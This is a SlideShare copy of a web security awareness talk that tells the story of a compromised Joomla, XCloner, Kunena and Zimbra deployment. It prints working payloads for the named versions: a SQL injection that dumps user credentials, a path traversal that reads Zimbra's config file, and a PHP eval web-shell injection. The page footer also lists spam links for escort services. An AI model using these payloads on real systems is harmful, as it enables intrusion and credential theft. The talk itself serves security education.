SlideShare a Scribd company logo
1 of 30
Download to read offline
TThhee WWeebb yyoouu tthhoouugghhtt yyoouu 
kknneeww 
By Munir Njiru and Ruth Macharia
WWeebb SSeeccuurriittyy PPlleeaassee?? 
● Most people don't think its relevant , why? 
– you either can't comprehend someone 
attacking you.' 
– you have no idea about attacks
OOWWAASSPP ttoopp 1100 
● Glad I got your attention.. 
● There are guys that have tried to open 
your eyes by creating awareness of this, 
they are OWASP (Open Web Application 
Security Project) 
● They have ten categories for these attacks 
but I will not bore you with all that talk so 
get more info here: 
https://www.owasp.org/index.php/Top_10_2013-Top_10
DDoonn’’tt bbee iilllluussiioonneedd!!!! 
 The web can’t be covered in a day , Bear with 
this it’s a tip of the iceberg but relevant. If we 
could cover it You’d feel this:
SSoo wwhhaatt’’ss tthhee wwoorrsstt?? 
 Why should I care what could these breaches possibly 
do you ask? 
 Well you could lose your webutation 
 You could lose cash 
 You could have your secrets exposed 
 And for admins you could involuntarily sign a power 
sharing agreement, and we know you don't like that. 
 This list is not comprehensive if you are holding your 
breath keep holding it :)
You shall see the worst and jumbled stuff on 
screen when an attack is carried out but don’t 
panic when you see all the technical jargon on 
screen just look at the results from the jargon 
and the answer to what was happening shall 
come. 
DDiissccllaaiimmeerr
II mmaaddee aa MMiissttaakkee HHooww?? 
 Let us tell this as a story, you see how slowly 
people fit in the OWASP Top 10, maybe not 
everywhere but enough places to render you 
done for:
II mmaaddee aa MMiissttaakkee HHooww?? 
 So the IT Manager had a proposition of giving a 
dynamic site with the technology of today and a 
robust mail server for communication. Here are 
his specifications : 
 Dynamic content management on a robust 
platform (Joomla) 
 Backup system based on XCloner 
 Forum Based on Kunena to enable interaction 
for staff and clients 
 Zimbra Server for Mail Handling 

II mmaaddee aa MMiissttaakkee HHooww?? 
 He missed however to check the security of the 
proposed system and the version information 
led to this sites demise. 
 Let me save you the headache of his version 
information- recon was spoken of well it got us 
this: 
- Joomla 1.5.15 
- Xcloner 2.1 
- Kunena 1.6.1 
- Zimbra 8.0.2
XXSSSS 
 Well this is the ability for an attacker to diss you 
using your browser. 
 It’s basically the ability to add code to what you 
see , and this code is not usually added in your 
best interest.
YYoouurr BBrroowwsseerr DDiisssseedd YYoouu!! 
 Payload=> <script>alert("I said it was just an 
XSS what's the worst that could happen? n 
Then the hackers at Africahackon went straight 
for my cookie jar and found all my secrets: nn" 
);</script>
YYoouurr BBrroowwsseerr DDiisssseedd YYoouu!! 
DDeemmoo
SSQQLL IInnjjeeccttiioonn 
 First of all you don’t need to go through a 
medicine class to get this. 
 In layman what it is the ability to sweet talk your 
database so that it can give it up !!!
II jjuusstt ssaaww mmyy NNaammee!!!!!!!! 
 Payload => %' and 1=2) union select 1, 
concat(0x3a,username,0x3a,email,0x3a,0x3a,a 
ctivation),concat(0x3a,username,0x3a,email,0x 
3a,password,0x3a,activation),'Super 
Administrator','email','2009-11-26 
22:09:28','2009-11-26 
22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
II jjuusstt ssaaww mmyy NNaammee!!!!!!!! 
DDeemmoo
IInnffoorrmmaattiioonn DDiisscclloossuurree 
 It's technically giving information to anyone ... 
 Payload=> task=info
IInnffoorrmmaattiioonn DDiisscclloossuurree 
DDeemmoo
LLFFII 
 This is basically the ability to read files within the 
system.. 
 If you are thinking big deal so what just chill you 
will be answered.
WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????
WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????
WWaaiiiiiitttttt tthhee mmaaiill ttoooooo?????? 
 Payload=> 
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,Zm 
Keys,ZdMsg,Ajx%20TemplateMsg.js.zgz? 
v=091214175450&skin=../../../../../../../../../opt/zi 
mbra/conf/localconfig.xml%00
WWaaiiiiiitttttt tthhee mmaaiill ttoooooo?????? 
DDeemmoo
SSeeee iitt iinn AAccttiioonn!!!!!!!! 
To see this manually done without the 
script check our video to get the gist of 
the background: 
http://www.youtube.com/watch?v=ahJLY 
T8CLow
RRCCEE 
 Just when you thought we were done :D well you 
were warned , the web is wide but we will be 
winding up in a bit. 
 RCE - Its not "Regional Centers of Expertise", It's 
Remote Code Execution
WWhhaatt JJuusstt HHaappppeenneedd?????? 
 Payload=> ?task=step2&output_url_pref=';+}+? 
>+<?php+eval($_GET['africahackon']);+? 
>&output_path=../../../../
WWhhaatt JJuusstt HHaappppeenneedd?????? 
DDeemmoo
RReemmeeddiiaattiioonn 
● This would all have been avoided if: 
– Data was validated on the platform 
– The technology was investigated before 
being implemented.
QQuueessttiioonnss 
● Don't be ashamed to scratch your head 
after this; I would too its a lot of 
information.
CCoonnttaacctt UUss
THANK YOU

More Related Content

Similar to The Web You Thought You Knew

Less is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OLess is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OMichael Roytman
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrongafa reg
 
PCI OWASP Course Storyboard
PCI OWASP Course StoryboardPCI OWASP Course Storyboard
PCI OWASP Course StoryboardJim Piechocki
 
Things that go bump on the web - Web Application Security
Things that go bump on the web - Web Application SecurityThings that go bump on the web - Web Application Security
Things that go bump on the web - Web Application SecurityChristian Heilmann
 
An AI Bot will Build and Run your next site… eventually
An AI Bot will Build and Run your next site… eventuallyAn AI Bot will Build and Run your next site… eventually
An AI Bot will Build and Run your next site… eventuallyRonald Ashri
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Security - The WLF Principle
Security - The WLF PrincipleSecurity - The WLF Principle
Security - The WLF PrincipleMarco Gralike
 
Hack the book Mini
Hack the book MiniHack the book Mini
Hack the book MiniKhairi Aiman
 
Designing Smart and Clever Applications
Designing Smart and Clever ApplicationsDesigning Smart and Clever Applications
Designing Smart and Clever ApplicationsDan Saffer
 
Practical resource monitoring with munin (English editon)
Practical resource monitoring with munin  (English editon)Practical resource monitoring with munin  (English editon)
Practical resource monitoring with munin (English editon)Masahito Zembutsu
 
A Connectivist Yankee in King Ning's Court
A Connectivist Yankee in King Ning's CourtA Connectivist Yankee in King Ning's Court
A Connectivist Yankee in King Ning's Courtsschwister
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Building an Anti-CMS
Building an Anti-CMSBuilding an Anti-CMS
Building an Anti-CMSMichael Nolan
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
Essay Describe A Funny Person - Adjectives Des
Essay Describe A Funny Person - Adjectives DesEssay Describe A Funny Person - Adjectives Des
Essay Describe A Funny Person - Adjectives DesDiane Allen
 
Beyond xss (SheHacks Nairobi 2018)
Beyond xss (SheHacks Nairobi 2018)Beyond xss (SheHacks Nairobi 2018)
Beyond xss (SheHacks Nairobi 2018)Munir Njiru
 
How to prevent cyber terrorism taragana
How to prevent cyber terrorism  taraganaHow to prevent cyber terrorism  taragana
How to prevent cyber terrorism taraganaGilles Sgro
 
Multitenency - Solving Security Issue
Multitenency - Solving Security Issue Multitenency - Solving Security Issue
Multitenency - Solving Security Issue MANVENDRA PRIYADARSHI
 

Similar to The Web You Thought You Knew (20)

Less is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/OLess is More: Behind the Data at Risk I/O
Less is More: Behind the Data at Risk I/O
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrong
 
PCI OWASP Course Storyboard
PCI OWASP Course StoryboardPCI OWASP Course Storyboard
PCI OWASP Course Storyboard
 
Things that go bump on the web - Web Application Security
Things that go bump on the web - Web Application SecurityThings that go bump on the web - Web Application Security
Things that go bump on the web - Web Application Security
 
An AI Bot will Build and Run your next site… eventually
An AI Bot will Build and Run your next site… eventuallyAn AI Bot will Build and Run your next site… eventually
An AI Bot will Build and Run your next site… eventually
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Security - The WLF Principle
Security - The WLF PrincipleSecurity - The WLF Principle
Security - The WLF Principle
 
Hack the book Mini
Hack the book MiniHack the book Mini
Hack the book Mini
 
Designing Smart and Clever Applications
Designing Smart and Clever ApplicationsDesigning Smart and Clever Applications
Designing Smart and Clever Applications
 
Practical resource monitoring with munin (English editon)
Practical resource monitoring with munin  (English editon)Practical resource monitoring with munin  (English editon)
Practical resource monitoring with munin (English editon)
 
A Connectivist Yankee in King Ning's Court
A Connectivist Yankee in King Ning's CourtA Connectivist Yankee in King Ning's Court
A Connectivist Yankee in King Ning's Court
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Building an Anti-CMS
Building an Anti-CMSBuilding an Anti-CMS
Building an Anti-CMS
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
Essay Describe A Funny Person - Adjectives Des
Essay Describe A Funny Person - Adjectives DesEssay Describe A Funny Person - Adjectives Des
Essay Describe A Funny Person - Adjectives Des
 
Beyond xss (SheHacks Nairobi 2018)
Beyond xss (SheHacks Nairobi 2018)Beyond xss (SheHacks Nairobi 2018)
Beyond xss (SheHacks Nairobi 2018)
 
Hacking For Innovation
Hacking For InnovationHacking For Innovation
Hacking For Innovation
 
How to prevent cyber terrorism taragana
How to prevent cyber terrorism  taraganaHow to prevent cyber terrorism  taragana
How to prevent cyber terrorism taragana
 
Multitenency - Solving Security Issue
Multitenency - Solving Security Issue Multitenency - Solving Security Issue
Multitenency - Solving Security Issue
 

Recently uploaded

VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsstephieert
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 

Recently uploaded (20)

VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girls
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 

The Web You Thought You Knew

  • 1. TThhee WWeebb yyoouu tthhoouugghhtt yyoouu kknneeww By Munir Njiru and Ruth Macharia
  • 2. WWeebb SSeeccuurriittyy PPlleeaassee?? ● Most people don't think its relevant , why? – you either can't comprehend someone attacking you.' – you have no idea about attacks
  • 3. OOWWAASSPP ttoopp 1100 ● Glad I got your attention.. ● There are guys that have tried to open your eyes by creating awareness of this, they are OWASP (Open Web Application Security Project) ● They have ten categories for these attacks but I will not bore you with all that talk so get more info here: https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 4. DDoonn’’tt bbee iilllluussiioonneedd!!!!  The web can’t be covered in a day , Bear with this it’s a tip of the iceberg but relevant. If we could cover it You’d feel this:
  • 5. SSoo wwhhaatt’’ss tthhee wwoorrsstt??  Why should I care what could these breaches possibly do you ask?  Well you could lose your webutation  You could lose cash  You could have your secrets exposed  And for admins you could involuntarily sign a power sharing agreement, and we know you don't like that.  This list is not comprehensive if you are holding your breath keep holding it :)
  • 6. You shall see the worst and jumbled stuff on screen when an attack is carried out but don’t panic when you see all the technical jargon on screen just look at the results from the jargon and the answer to what was happening shall come. DDiissccllaaiimmeerr
  • 7. II mmaaddee aa MMiissttaakkee HHooww??  Let us tell this as a story, you see how slowly people fit in the OWASP Top 10, maybe not everywhere but enough places to render you done for:
  • 8. II mmaaddee aa MMiissttaakkee HHooww??  So the IT Manager had a proposition of giving a dynamic site with the technology of today and a robust mail server for communication. Here are his specifications :  Dynamic content management on a robust platform (Joomla)  Backup system based on XCloner  Forum Based on Kunena to enable interaction for staff and clients  Zimbra Server for Mail Handling 
  • 9. II mmaaddee aa MMiissttaakkee HHooww??  He missed however to check the security of the proposed system and the version information led to this sites demise.  Let me save you the headache of his version information- recon was spoken of well it got us this: - Joomla 1.5.15 - Xcloner 2.1 - Kunena 1.6.1 - Zimbra 8.0.2
  • 10. XXSSSS  Well this is the ability for an attacker to diss you using your browser.  It’s basically the ability to add code to what you see , and this code is not usually added in your best interest.
  • 11. YYoouurr BBrroowwsseerr DDiisssseedd YYoouu!!  Payload=> <script>alert("I said it was just an XSS what's the worst that could happen? n Then the hackers at Africahackon went straight for my cookie jar and found all my secrets: nn" );</script>
  • 13. SSQQLL IInnjjeeccttiioonn  First of all you don’t need to go through a medicine class to get this.  In layman what it is the ability to sweet talk your database so that it can give it up !!!
  • 14. II jjuusstt ssaaww mmyy NNaammee!!!!!!!!  Payload => %' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,a ctivation),concat(0x3a,username,0x3a,email,0x 3a,password,0x3a,activation),'Super Administrator','email','2009-11-26 22:09:28','2009-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
  • 15. II jjuusstt ssaaww mmyy NNaammee!!!!!!!! DDeemmoo
  • 16. IInnffoorrmmaattiioonn DDiisscclloossuurree  It's technically giving information to anyone ...  Payload=> task=info
  • 18. LLFFII  This is basically the ability to read files within the system..  If you are thinking big deal so what just chill you will be answered.
  • 21. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????  Payload=> res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,Zm Keys,ZdMsg,Ajx%20TemplateMsg.js.zgz? v=091214175450&skin=../../../../../../../../../opt/zi mbra/conf/localconfig.xml%00
  • 22. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo?????? DDeemmoo
  • 23. SSeeee iitt iinn AAccttiioonn!!!!!!!! To see this manually done without the script check our video to get the gist of the background: http://www.youtube.com/watch?v=ahJLY T8CLow
  • 24. RRCCEE  Just when you thought we were done :D well you were warned , the web is wide but we will be winding up in a bit.  RCE - Its not "Regional Centers of Expertise", It's Remote Code Execution
  • 25. WWhhaatt JJuusstt HHaappppeenneedd??????  Payload=> ?task=step2&output_url_pref=';+}+? >+<?php+eval($_GET['africahackon']);+? >&output_path=../../../../
  • 27. RReemmeeddiiaattiioonn ● This would all have been avoided if: – Data was validated on the platform – The technology was investigated before being implemented.
  • 28. QQuueessttiioonnss ● Don't be ashamed to scratch your head after this; I would too its a lot of information.